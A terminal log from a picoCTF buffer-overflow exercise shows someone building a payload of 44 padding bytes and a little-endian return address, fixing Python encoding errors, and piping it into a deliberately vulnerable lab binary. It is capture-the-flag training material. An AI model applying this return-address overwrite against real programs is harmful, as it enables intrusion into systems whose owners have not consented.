binary_exploitation/buffer_overflow1/example_text.txt
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('Hello World!)"                            
zsh: event not found: )
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('Hello World!')"
Hello World!
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAö\x91\x04\x08')" | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 c3b6 c291  AAAAAAAAAAAA....
00000030: 0408 0a                                  ...
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x\x91\x04\x08')" | xxd
  File "<string>", line 1
    print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x\x91\x04\x08')
                                                                      ^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 44-45: truncated \xXX escape
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')"      
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAö
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')" | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 c3b6 c291  AAAAAAAAAAAA....
00000030: 0408 0a                                  ...
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')" | ./vuln
Please enter your string: 
Okay, time to return... Fingers Crossed... Jumping to 0x91c2b6c3
zsh: done                python3 -c  | 
zsh: segmentation fault  ./vuln
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "import sys; sys.stdout.buffer.write ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')"         
Traceback (most recent call last):
  File "<string>", line 1, in <module>
TypeError: a bytes-like object is required, not 'str'
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "import sys; sys.stdout.buffer.write('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')"  
Traceback (most recent call last):
  File "<string>", line 1, in <module>
TypeError: a bytes-like object is required, not 'str'
                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "import sys; sys.stdout.buffer.write(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')" 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�                                                                                                            
┌──(kali㉿kali)-[~/picoCTF/binary_exploitation/buffer_overflow1]
└─$ python3 -c "import sys; sys.stdout.buffer.write(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08')" | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 f691 0408  AAAAAAAAAAAA....
                                                                                 